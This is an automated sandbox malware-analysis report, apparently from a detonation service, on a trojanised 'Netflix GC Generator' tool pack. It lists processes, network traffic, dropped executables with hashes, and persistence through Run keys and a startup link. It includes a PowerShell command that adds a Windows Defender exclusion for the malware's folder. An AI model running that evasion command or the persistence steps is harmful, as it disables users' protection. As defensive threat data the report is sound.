C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.121.18.2.in-addr.arpa | udp |
Files
memory/4992-133-0x0000000000950000-0x0000000000964000-memory.dmp
memory/4992-134-0x00000000058E0000-0x0000000005E84000-memory.dmp
memory/4992-135-0x0000000005270000-0x0000000005302000-memory.dmp
memory/4992-136-0x0000000005200000-0x000000000520A000-memory.dmp
memory/4992-137-0x0000000005820000-0x000000000589E000-memory.dmp
memory/4992-138-0x00000000051C0000-0x00000000051D0000-memory.dmp
memory/3808-139-0x00000000023C0000-0x00000000023F6000-memory.dmp
memory/3808-140-0x0000000004DD0000-0x00000000053F8000-memory.dmp
memory/3808-143-0x0000000002410000-0x0000000002420000-memory.dmp
memory/3808-142-0x0000000002410000-0x0000000002420000-memory.dmp
memory/4992-141-0x00000000051C0000-0x00000000051D0000-memory.dmp
memory/3808-144-0x0000000004D70000-0x0000000004D92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhwsafm3.a52.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3808-147-0x0000000005630000-0x0000000005696000-memory.dmp
memory/3808-151-0x00000000056A0000-0x0000000005706000-memory.dmp
memory/3808-156-0x0000000005D60000-0x0000000005D7E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4992-178-0x0000000006560000-0x00000000065D6000-memory.dmp
memory/4992-179-0x0000000006540000-0x000000000655E000-memory.dmp
memory/3808-180-0x0000000002410000-0x0000000002420000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4336-195-0x00000000003F0000-0x0000000000402000-memory.dmp
memory/3808-196-0x0000000006340000-0x0000000006372000-memory.dmp
memory/3808-197-0x000000006FE20000-0x000000006FE6C000-memory.dmp
memory/3808-207-0x0000000006320000-0x000000000633E000-memory.dmp
memory/3808-208-0x00000000076C0000-0x0000000007D3A000-memory.dmp
memory/3808-209-0x0000000007070000-0x000000000708A000-memory.dmp
memory/3808-210-0x00000000070E0000-0x00000000070EA000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3808-214-0x000000007FCC0000-0x000000007FCD0000-memory.dmp
memory/4336-212-0x0000000004B90000-0x0000000004BA0000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4268-217-0x0000000000250000-0x0000000000262000-memory.dmp
memory/4268-218-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
memory/3808-221-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/3808-222-0x00000000072B0000-0x00000000072BE000-memory.dmp
memory/3808-223-0x00000000073B0000-0x00000000073CA000-memory.dmp
memory/3808-224-0x00000000073A0000-0x00000000073A8000-memory.dmp
memory/4336-227-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/4268-228-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
35s
Max time network
53s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Netflix GC Cracked.to.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xe4,0x104,0x7ff9f65f46f8,0x7ff9f65f4708,0x7ff9f65f4718
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1853607529233670984,622167129225036164,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 52.168.112.66:443 | tcp | |
| US | 8.8.8.8:53 | 37.146.190.20.in-addr.arpa | udp |
| US | 2.18.121.83:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | cracked.to | udp |
| GB | 96.16.110.41:443 | tcp | |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 8.8.8.8:53 | 245.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.io | udp |
| US | 172.67.69.246:443 | cracked.io | tcp |
| US | 8.8.8.8:53 | 16.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.69.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cracked.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cracked.to | udp |
| N/A | 224.0.0.251:5353 | udp |
Files
memory/2204-133-0x0000000000450000-0x0000000000480000-memory.dmp
memory/2204-134-0x0000000004E10000-0x0000000004EAC000-memory.dmp
memory/2204-135-0x0000000005460000-0x0000000005A04000-memory.dmp
memory/2204-136-0x0000000004F50000-0x0000000004FE2000-memory.dmp
memory/2204-137-0x0000000004DF0000-0x0000000004E00000-memory.dmp
memory/2204-138-0x0000000004EC0000-0x0000000004ECA000-memory.dmp
memory/2204-139-0x00000000050E0000-0x0000000005136000-memory.dmp
memory/3284-140-0x0000000000280000-0x0000000000294000-memory.dmp
memory/3284-141-0x0000000004B70000-0x0000000004B80000-memory.dmp
memory/3284-142-0x00000000061F0000-0x000000000626E000-memory.dmp
memory/3284-144-0x0000000004B70000-0x0000000004B80000-memory.dmp
memory/5068-145-0x00000000008B0000-0x0000000000902000-memory.dmp
memory/652-146-0x00000000029F0000-0x0000000002A26000-memory.dmp
memory/652-147-0x0000000005560000-0x0000000005B88000-memory.dmp
memory/5068-148-0x0000000005250000-0x0000000005260000-memory.dmp
memory/652-149-0x0000000004F20000-0x0000000004F30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_utnfw151.i25.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/652-152-0x0000000005B90000-0x0000000005BB2000-memory.dmp
memory/652-156-0x0000000005C30000-0x0000000005C96000-memory.dmp
memory/652-161-0x0000000005E10000-0x0000000005E76000-memory.dmp
memory/652-162-0x0000000006320000-0x000000000633E000-memory.dmp
memory/5068-163-0x0000000002C00000-0x0000000002C1C000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3284-185-0x0000000006A00000-0x0000000006A76000-memory.dmp
memory/3284-187-0x00000000069E0000-0x00000000069FE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 09932bc072dfd2591f537c31e7f7c5bc |
| SHA1 | 5992d292629688f3b98db35a6274f9b9ef8baef1 |
| SHA256 | 41de587416d72dd9c2e27745572592deb76b2646b7c6491a6041019662a10c32 |
| SHA512 | 0141ddf09fbef149d342e48c3fc98231a707b9d95f52e65c530e3a7d7f4172a68bd15c270eb44759063b528a938a14ab19c5ff400c6f7092aff793d8a93e1a47 |
memory/3416-207-0x0000000000260000-0x0000000000272000-memory.dmp
\??\pipe\LOCAL\crashpad_4304_TIQXPABYKHLWJYPB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/652-213-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/3416-215-0x0000000004BD0000-0x0000000004BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
memory/652-223-0x00000000072D0000-0x0000000007302000-memory.dmp
memory/652-224-0x000000006F140000-0x000000006F18C000-memory.dmp
memory/652-235-0x0000000007290000-0x00000000072AE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/652-239-0x000000007F080000-0x000000007F090000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2840-242-0x0000000000930000-0x0000000000942000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/652-245-0x0000000007C80000-0x00000000082FA000-memory.dmp
memory/652-246-0x0000000007630000-0x000000000764A000-memory.dmp
memory/2840-248-0x0000000005140000-0x0000000005150000-memory.dmp
memory/652-249-0x00000000076A0000-0x00000000076AA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 218e449501e9bc2755a9758e17de9cde |
| SHA1 | b29d3810fddc119b996275825d0d6b6bfe00129f |
| SHA256 | 6d27f9bfbdbb874d2e62a7e5276ff2405fefb4971374b6b593aaf0e408b15c86 |
| SHA512 | 5d0fa1934bfe03f54332134d07aad59044b05510c38b2ebd98f963867f2efc1e52aaca23e26925b395e7b5a6ae1a0c95c98d51050c909ae6a2d78ddc8f02cf68 |
memory/652-255-0x00000000078B0000-0x0000000007946000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7f2c89788f5d86c1b5afae06b3087bda |
| SHA1 | ff9443ccd26e98585abf59956b52be839f525139 |
| SHA256 | 26fabf9abceff81111ff2ef1fdc3fa564fba688d6bc83609dc8558b61edb623d |
| SHA512 | 7a30e7f5d6325c1e0abb749dc3692c849e5877de1fb13925fac6664a29596a6a1b857015da0eadc58d5fb9e3d83c91bd2a234be0d96a3ecaef752e0d470d5a96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 06031cccee6e1ce17966c1b80f33d9ef |
| SHA1 | 8bde290327d41dc22ce2fa24bac69f4e849af953 |
| SHA256 | 3f5e917be6bfc9311f21bd4a8e702938814a3da67c1220db142cc94976fa4c90 |
| SHA512 | 1a8875afb7f567c16a1ea01318bd97a06dcffd7470fb80f154dbdc57487c1a50ab21127e8af433f2fb0b1e753813b24d789a4fdfd9992267ff75ef0b15fc7322 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
| MD5 | 8460db432a6d863a6846e379064b4def |
| SHA1 | d779f0eec861a9419974ea7e79466b282ca5fb1f |
| SHA256 | 4fe10d06463c8a680c4048dbbec4d127e785ad31a24aeb466309fa1e429cf122 |
| SHA512 | 2003262bb341f823c133e77f0eb3a1d29915da4903cdc18361344051ce28ca171974b4ace46e8644b57db7742b98d59aebf252e70991584640b69dd83570c1c1 |
memory/5068-324-0x0000000005250000-0x0000000005260000-memory.dmp
memory/652-325-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/652-326-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/652-333-0x0000000007860000-0x000000000786E000-memory.dmp
memory/652-334-0x0000000007970000-0x000000000798A000-memory.dmp
memory/652-336-0x0000000007950000-0x0000000007958000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9e0984d5da7cc1d108493c72eaf59519 |
| SHA1 | 6c90837191631ff7526d55d755744112b0d7f903 |
| SHA256 | a9e0e81345947ff98dd455293e3d772a36e9c93637ab8511b730d9ad78bf4712 |
